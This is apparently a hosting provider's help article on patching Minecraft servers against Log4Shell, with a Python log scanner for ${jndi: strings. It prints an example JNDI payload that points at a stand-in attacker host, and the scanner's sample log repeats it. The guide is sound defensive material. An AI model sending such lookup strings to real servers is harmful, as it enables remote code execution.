How to Protect Your Server from the Log4j Vulnerability
Learn how to patch the Log4Shell (CVE-2021-44228) vulnerability on your Minecraft server.
The Log4j vulnerability (Log4Shell, CVE-2021-44228) was a critical security flaw discovered in December 2021 that affected Minecraft servers. It allowed attackers to execute arbitrary code by sending a specially crafted chat message.
Am I Affected?
| Minecraft Version | Affected? | Fix |
|---|---|---|
| 1.18.1+ | No | Patched by Mojang |
| 1.17–1.18 | Yes | Update or apply JVM flag |
| 1.12–1.16.5 | Yes | Apply JVM flag |
| 1.7–1.11 | Partially | Apply JVM flag |
| Below 1.7 | No | Uses older Log4j |
If you're running Minecraft 1.18.1 or newer, you're already safe. Mojang patched this in the official release.
Fixing the Vulnerability
Update to the latest version (recommended)
The simplest fix is updating to Minecraft 1.18.1 or later. Update your server JAR through Software Version on the XGamingServer panel.
Apply the JVM flag (for older versions)
If you can't update, add this JVM flag in Startup:
For Minecraft 1.12–1.18:
-Dlog4j2.formatMsgNoLookups=true
For Minecraft 1.7–1.11, you need a patched Log4j configuration file. Download the official fix from Mojang and add:
-Dlog4j.configurationFile=log4j2_17-111.xml
Update Paper/Spigot
If you're running Paper or Spigot, update to the latest build for your Minecraft version. Both projects released patches shortly after the vulnerability was disclosed.
Restart the server
Restart from Console for the fix to take effect.
How the Exploit Worked
An attacker could send a chat message like:
${jndi:ldap://attacker-server.com/exploit}
The Log4j library would process this string, connect to the attacker's server, download malicious code, and execute it — giving the attacker full control of the server machine.
Verifying the Fix
After applying the fix:
- Check your server's Java version — Java 17+ includes the Log4j fix
- Verify the JVM flag is active in Console startup output
- Test with a Log4j scanner (search "Log4Shell scanner" for safe testing tools)
Additional Security Measures
- Keep your server software updated
- Use a firewall to restrict outbound connections from the server
- Monitor server logs for suspicious ${jndi: strings
- Use server logs to check for past exploitation attempts
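The two log checks in the list above can be scripted. This is an added example, not part of the original guide or XGamingServer's tooling. It assumes the usual Minecraft logs folder layout (latest.log plus gzip-rotated YYYY-MM-DD-N.log.gz archives), and the log lines it writes are constructed samples.

```python
import gzip
import re
import tempfile
from pathlib import Path

# The prefix the guide says to look for, matched case-insensitively.
PREFIX_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# When a URL follows, capture the scheme and host the server was pointed at.
URL_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}:]+)", re.IGNORECASE)
TIME_RE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\]")

def open_log(path):
    """Open latest.log or a gzip-rotated archive as text, tolerating bad bytes."""
    opener = gzip.open if path.suffix == ".gz" else open
    return opener(path, "rt", encoding="utf-8", errors="replace")

def scan_logs(log_dir):
    """Return one finding per log line that contains a ${jndi: string."""
    findings = []
    for path in sorted(Path(log_dir).glob("*.log*")):
        with open_log(path) as handle:
            for lineno, line in enumerate(handle, 1):
                if not PREFIX_RE.search(line):
                    continue
                url, stamp = URL_RE.search(line), TIME_RE.match(line)
                findings.append({
                    "file": path.name, "line": lineno,
                    "time": stamp.group(1) if stamp else None,
                    "scheme": url.group(1).lower() if url else None,
                    "host": url.group(2).lower() if url else None,
                })
    return findings

def write_sample_logs(log_dir):
    """Create constructed sample logs (not real server data) for the demo."""
    old = ("[18:41:07] [Server thread/INFO]: <Alex> hello\n"
           "[18:42:30] [Server thread/INFO]: <Unknown123> "
           "${jndi:ldap://attacker-server.com/exploit}\n")
    new = ("[10:05:12] [Server thread/INFO]: <Steve> anyone selling iron?\n"
           "[10:06:40] [Server thread/INFO]: <Steve> what is ${jndi: anyway\n")
    with gzip.open(Path(log_dir) / "2021-12-10-1.log.gz", "wt", encoding="utf-8") as f:
        f.write(old)
    (Path(log_dir) / "latest.log").write_text(new, encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_logs(tmp)
        for hit in scan_logs(tmp):
            print(hit)
```

Point scan_logs at your real logs folder to list every hit with its file, line and time. The extracted hosts can then be compared against your firewall's outbound connection records.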
⚠️ Warning: If your server was running an unpatched version during December 2021–early 2022 and was publicly accessible, it may have been compromised. Check for unfamiliar files, plugins, or scheduled tasks.
📝 Note: XGamingServer applied protective measures across all servers during the initial disclosure. If you're hosting with us, your server was protected. This guide is primarily for awareness and for anyone running custom server JARs.
See also: Find Server Logs | Server Types
If you need help, join our Discord.